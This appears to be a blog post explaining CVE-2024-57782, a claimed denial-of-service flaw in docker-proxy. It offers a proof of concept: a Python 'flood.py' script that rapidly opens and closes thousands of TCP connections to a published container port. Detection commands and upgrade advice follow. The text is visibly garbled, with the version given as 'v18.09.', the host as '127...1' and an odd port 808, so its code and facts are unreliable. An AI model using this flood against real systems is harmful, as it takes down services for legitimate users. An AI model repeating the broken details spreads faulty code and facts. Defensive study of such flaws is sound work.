CVE-2024-57782 - Denial of Service in Docker-Proxy v18.09. Explained & Exploited

---

Docker has become the de facto tool for containerization. However, its widespread adoption also makes it a prime target for attackers. Recently, a new vulnerability—CVE-2024-57782—was discovered in docker-proxy v18.09. that can be abused to cause a Denial of Service (DoS). This post explains how the vulnerability works, how it can be exploited, and pointers to official references. We’ll also provide code snippets for demonstration and detection.

What is docker-proxy?

First, a quick recap: docker-proxy is a helper program started by Docker when you publish ports from your containers to your host machine. It listens on a host port and forwards traffic into the container’s network stack. It’s essential for port forwarding on bridge or host networks, and it’s present in many Docker deployments by default.

What is CVE-2024-57782?

CVE-2024-57782 is a Denial of Service flaw. In short, a specially-crafted request or sequence of requests sent to docker-proxy can make it unresponsive, crash, or consume excessive system resources. This knocks out any container port forwarding—effectively disabling access to affected services.

Official References

- NVD – CVE-2024-57782 Entry
- Docker Github repository
- Docker Security Advisories

An attacker can rapidly open and close TCP connections to a container’s published port.

- This leaves the proxy process with "zombie" sockets or stuck descriptors, gradually exhausting system filehandles or resources.
- Eventually, all new connections are refused or dropped, causing a denial of service for legitimate users.

This vulnerability doesn’t require authentication or special access—the attacker just needs network access to a published port.

Proof-of-Concept

With basic bash and Python scripting, you can simulate the attack on a vulnerable system.

Step 1: Deploy a Docker Container With Exposed Port

docker run -d -p 808:80 nginx

This starts Nginx on port 80 inside the container, mapped to port 808 on your host.

Here’s a Python snippet to make rapid connections and close them immediately

import socket
import time

HOST = '127...1'
PORT = 808

for _ in range(10000):  # Increase this number as needed
    try:
        s = socket.create_connection((HOST, PORT), timeout=.1)
        s.close()
    except Exception as e:
        pass
    time.sleep(.001)  # Tiny pause to avoid throttling

Save this as flood.py and run it

python3 flood.py

On a vulnerable setup, after a few thousand connections, the docker-proxy process will begin to misbehave:

You can check your Docker version and the presence of the docker-proxy process

docker --version
ps aux | grep docker-proxy

If you’re on v18.09., your system may be at risk.

Additionally, monitor your host’s file descriptor usage (look for a rapid rise during an attack)

lsof -p $(pgrep docker-proxy)

Mitigation and Fix

Upgrade Docker immediately to the latest supported version. Later versions have addressed resource management and robust connection handling in docker-proxy.

- Docker Release Notes

Conclusion

CVE-2024-57782 is proof that even mature tools like Docker can have critical issues in supporting components. Any time you expose ports, review your proxy and network settings, apply security updates, and restrict untrusted access.

References

- CVE-2024-57782 at NVD
- Docker Moby repo – Issue tracker
- Docker Security Documentation


Disclaimer: Exploit code and information shared for educational and defensive research purposes only. Do not attack production or third-party systems without explicit permission.

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:24 UTC